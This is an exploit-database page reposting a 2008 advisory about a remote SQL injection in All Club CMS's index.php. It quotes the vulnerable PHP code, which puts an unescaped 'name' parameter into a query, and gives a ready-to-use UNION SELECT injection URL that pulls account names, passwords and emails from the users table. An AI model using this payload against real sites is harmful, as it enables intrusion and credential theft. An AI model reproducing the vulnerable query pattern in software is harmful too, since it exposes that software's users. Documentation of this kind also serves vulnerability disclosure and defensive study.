[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

All Club CMS <= 0.0.2 index.php Remote SQL Injection Vulnerability

Author
ka0x
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2602
Category
web applications
Date add
05-02-2008
Platform
unsorted
==================================================================
All Club CMS <= 0.0.2 index.php Remote SQL Injection Vulnerability
==================================================================



-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
 All Club CMS <= 0.0.1f index.php Remote SQL Injection Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


bug found by ka0x
D.O.M TEAM 2008
we are: ka0x, an0de, xarnuz
http://www.domlabs.org/

Script affected: All Club CMS
Vulnerability: Remote SQL Injection

need magic_quotes_gpc = off


vuln code:

[...]

if (isset($_GET['name']) && (!(empty($_GET['name'])))) {
   
  $name = $_GET['name'];
  $name = stripslashes($name);
  // stop hackers
  if (eregi("http\:\/\/", $name)) {
      echo "<br />&nbps;&nbps;No go on the hack attempt.<br />";
      // log attempt, from IP, etc.
      if ($SYS_SET['ban_attack_ip']) {
        // ban ip if ban_attack_ip
      }
    die();
  }
   
  $sth = $dbh->prepare("SELECT * FROM accms_modules WHERE name='$name'");
 
[...]


Stripslashes function only deletes backslashes (\) and the backslashes
doubles (\\) becomes simple (\).


Exploit:
http://[host]/accms_path/index.php?name=-1'/**/union/**/select/**/1,concat(account,0x3a,password,0x3a,email),3,4,5,6,7,8,9,1,1,1,1/**/from/**/accms_users/**/where/**/id=1/*


__EOF__





#  0day.today [2024-11-14]  #